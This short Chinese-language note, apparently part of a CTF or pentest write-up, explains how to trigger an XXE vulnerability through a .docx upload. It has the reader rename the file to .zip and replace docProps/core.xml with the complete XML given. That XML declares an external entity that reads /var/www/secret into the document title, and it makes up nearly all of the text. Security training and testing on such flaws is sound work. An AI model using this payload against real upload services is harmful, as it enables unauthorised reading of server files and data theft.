下载模板docx文件,后缀改为zip,直接在zip下修改docProps/core.xml文件内容为
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE root[ <!ENTITY xxe SYSTEM "/var/www/secret"> ]> <cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <dc:title>&xxe;</dc:title> <dc:subject></dc:subject> <dc:creator></dc:creator> <cp:keywords></cp:keywords> <dc:description></dc:description> <cp:lastModifiedBy></cp:lastModifiedBy> <cp:revision>1</cp:revision> <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-01T19:00:00Z</dcterms:created> <dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-01T19:01:00Z</dcterms:modified> </cp:coreProperties>
|
改回docx格式上传即可触发XXE漏洞
